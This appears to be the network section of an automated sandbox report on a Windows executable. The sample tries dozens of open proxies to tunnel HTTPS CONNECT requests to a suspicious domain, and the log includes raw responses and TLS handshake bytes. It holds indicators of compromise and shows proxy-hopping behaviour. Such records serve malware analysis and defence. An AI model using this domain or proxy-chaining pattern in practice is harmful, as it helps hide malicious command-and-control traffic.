                                                                                                      Feb 23, 2024 09:45:15.422228098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.509898901 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      28192.168.2.449868104.19.235.10806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.424047947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.511368990 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      29192.168.2.449869104.25.87.42806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.424987078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.512350082 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      30192.168.2.449872172.67.38.96806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.433031082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.520812035 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      31192.168.2.449874203.32.120.202806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.435105085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.522443056 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      32192.168.2.44983141.111.187.214806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.453917980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.927985907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.662478924 CET98INHTTP/1.0 200 Connection Established
                                                                                                      Proxy-agent: Apache/2.4.37 (CentOS Stream) OpenSSL/1.1.1k


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      33192.168.2.449848198.105.111.8667646812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.465711117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.700108051 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                                      Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                                      Proxy-Connection: close
                                                                                                      X-Webshare-Error: 407
                                                                                                      X-Webshare-Reason: invalidpassword
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Length: 121
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                                      Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      34192.168.2.44979647.114.101.5788886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.468545914 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.810609102 CET334INHTTP/1.1 400 Bad Request
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 204
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>tengine</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      35192.168.2.44984794.130.181.59327706812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.496467113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.310009003 CET132INHTTP/1.1 503 Too many open connections
                                                                                                      Content-Type: text/plain
                                                                                                      Connection: close
                                                                                                      Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                                      Data Ascii: Maximum number of open connections reached.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      36192.168.2.44981513.234.24.11631286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.496467113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.039640903 CET65INHTTP/1.1 200 Connection Established
                                                                                                      Content-Type: text/plain


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      37192.168.2.449884132.148.128.8125196812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.507390976 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      38192.168.2.449771117.160.250.132806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.545665026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.093142033 CET303INHTTP/1.1 400 Bad Request
                                                                                                      Server: openresty
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 154
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      39192.168.2.449885185.38.111.180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.548518896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.735615969 CET75INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Length: 0
                                                                                                      Feb 23, 2024 09:45:15.923269987 CET103INHTTP/1.1 400 Bad Request
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                      Data Ascii: 400 Bad Request


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      40192.168.2.44997994.74.120.1924436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.554338932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      41192.168.2.44998094.74.120.1924436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.556538105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      42192.168.2.449959168.138.66.4810806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.573929071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      43192.168.2.449933192.169.226.96517786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.573935032 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.006136894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.474894047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      44192.168.2.44998594.74.120.1924436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.575119972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      45192.168.2.44998994.74.120.1924436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.578457117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      46192.168.2.449963104.19.233.117806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.590970993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.679143906 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      47192.168.2.449845103.152.116.82806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.596285105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.224884987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.115529060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:18.943734884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.612467051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.169958115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.834733009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.349016905 CET19INHTTP/1.1 200 OK
                                                                                                      Feb 23, 2024 09:45:31.807090044 CET202OUTData Raw: 16 03 03 00 c5 01 00 00 c1 03 03 65 d8 5b 2b 3a a3 8b e8 95 cc 0e 42 23 18 f3 ea 85 d8 9e 53 61 f4 fe 3d ba fb e0 f2 8b 68 0a 8a 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                      Data Ascii: e[+:B#Sa=h*,+0/$#('=<5/n-+(heygirlisheeverythingyouwantedinaman.com#
                                                                                                      Feb 23, 2024 09:45:32.277127981 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 d8 5b 2c 1e ad 0e 37 6d e6 fe 5b 1a 62 cd 4c 70 e2 9f e5 12 e3 9c a8 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 cb 0b 00 10 c7 00
                                                                                                      Data Ascii: C?e[,7m[bLpDOWNGRD/#00`4ZmQ0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240212203110Z240512203109Z03110/
                                                                                                      Feb 23, 2024 09:45:32.277170897 CET1286INData Raw: 6d dd 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 1f 8b 40 68 93 64 2a 2d dc 07 bd 7a 5f 46 c4 ea f2 c8 d7 63 e0 4e cc 42 c7 44 46 d1 17 84 d3 1f 08 47 69 c2 b6 7f dd 9d a0 2d 9e 1b be 1f f8 19 ab ad d9 8d 7d 14 62 f3 40 cf 76 94
                                                                                                      Data Ascii: m0*H@hd*-z_FcNBDFGi-}b@v*wTJ;dm55inz74|"@,+v?iS't;H%['rBu*q,/aeYXhV
                                                                                                      Feb 23, 2024 09:45:32.577183008 CET1286INData Raw: 59 02 10 51 5c e3 c0 2b fd b7 06 48 51 7e 09 5e 3f 0f dc a7 fe 97 e7 79 c5 0e 44 89 78 c5 69 59 29 a0 9a 3a 48 36 29 a6 94 93 55 2d b8 47 b5 e9 96 b5 9f 07 cd a6 ab 3e 32 8a c0 86 83 c5 c1 41 c8 9f 2f 35 8e 0d c0 07 7a e1 ac c9 65 b5 cb 8a a7 dd
                                                                                                      Data Ascii: YQ\+HQ~^?yDxiY):H6)U-G>2A/5zeqae92>z6VWAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\
                                                                                                      Feb 23, 2024 09:45:32.577394009 CET832INData Raw: 06 03 55 1d 23 04 18 30 16 80 14 60 7b 66 1a 45 0d 97 ca 89 50 2f 7d 04 cd 34 a8 ff fc fd 4b 30 60 06 08 2b 06 01 05 05 07 01 01 04 54 30 52 30 25 06 08 2b 06 01 05 05 07 30 01 86 19 68 74 74 70 3a 2f 2f 6f 63 73 70 2e 70 6b 69 2e 67 6f 6f 67 2f
                                                                                                      Data Ascii: U#0`{fEP/}4K0`+T0R0%+0http://ocsp.pki.goog/gsr10)+0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0
                                                                                                      Feb 23, 2024 09:45:33.967035055 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 ee d3 9c b7 1a 72 b7 93 54 c6 57 21 5f 81 b2 09 02 b3 ab 42 6b bc b7 f7 78 22 10 ed ca 53 57 06 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 80 e8 22 3b 49 57 0d 59 58 a0 23 33 a1 9f 45 c0 51 50 f2 a6 d2
                                                                                                      Data Ascii: %! rTW!_Bkx"SW(";IWYX#3EQPXe~,
                                                                                                      Feb 23, 2024 09:45:34.440515995 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1e 00 c0 2d 75 25 30 cd bf 35 3d a9 01 e1 3f 08 b6 df 2f 37 b6 15 92 18 41 34 45 80 05 ca 21 36 e3 7d 91 5c 3b 19 e8 9a b4 d9 9f 54 6f 66 2d c6 b0 d8 52 9a 77 be e6 d0 2d 2b b3 b5 4b 35 0d 28 7f e3 ba 33 f0 6d
                                                                                                      Data Ascii: -u%05=?/7A4E!6}\;Tof-Rw-+K5(3m-ewW#8$5ar1/jH^7y|gd9}N4-!9N3tb4Oc %-tNwbMh8x>R,B()2Fc?0c
                                                                                                      Feb 23, 2024 09:45:46.655848026 CET31INData Raw: 15 03 03 00 1a 00 00 00 00 00 00 00 01 05 a7 7a 13 e9 8e 67 7e 88 88 ec 13 1c 29 40 e1 e4 76
                                                                                                      Data Ascii: zg~)@v


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      48192.168.2.449833167.172.86.46104716812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.598009109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
